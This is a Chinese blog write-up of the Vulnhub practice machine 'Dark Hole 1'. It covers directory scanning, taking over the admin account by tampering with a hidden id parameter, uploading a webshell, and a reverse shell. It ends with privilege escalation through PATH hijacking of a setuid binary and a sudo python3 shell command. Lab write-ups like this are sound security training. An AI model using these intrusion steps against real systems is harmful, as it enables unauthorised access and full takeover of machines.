靶场实战 Vulnhub

Dark Hole 1

Dark Hole 1

Posted by Kyon-H on July 14, 2025

主机扫描,发现ip 192.168.163.134

image.png

端口扫描,发现80和22端口

image.png

扫描目录

1
2

dirb http://192.168.163.134
nikto -h 192.168.163.134

发现目录:

1
2
3

http://192.168.163.134/config/
http://192.168.163.134/upload/
http://192.168.163.134/login.php

对站点进行指纹识别,无发现,bp爆破用户名密码失败

尝试注册成功

登陆成功后地址为: http://192.168.163.134/dashboard.php?id=2

遍历页面id无效,只有一个页面,可以更改用户名、邮件和密码,sqlmap测试密码时发现隐藏字段id参数,bp遍历id尝试更改其他用户密码。

admin登录成功,可以上传文件

上传一句话木马,经测试可以上传 shell.phtml

蚁剑连接,反弹shell

image.png

反弹成功,查看数据库未发现有效信息

image.png

查看john家目录,发现特殊权限的 toto

image.png

toto疑似使用 id命令,更改环境变量修改为我们自定义的 id命令

1
2
3
4

echo '/bin/bash' > /tmp/id
chmod +x /tmp/id
export PATH=/tmp:$PATH
./toto

提权成功,获取到密码

image.png

获取到flag

image.png

root提权

image.png

1
2

echo 'import os;os.system("/bin/bash")' > file.py
sudo /usr/bin/python3 /home/john/file.py

root提权成功,查看最终flag

image.png

CATALOG
    FEATURED TAGS
    DVWA 靶场实战 Vulnhub DC系列 服务器 CTFHub Ubuntu 内网防护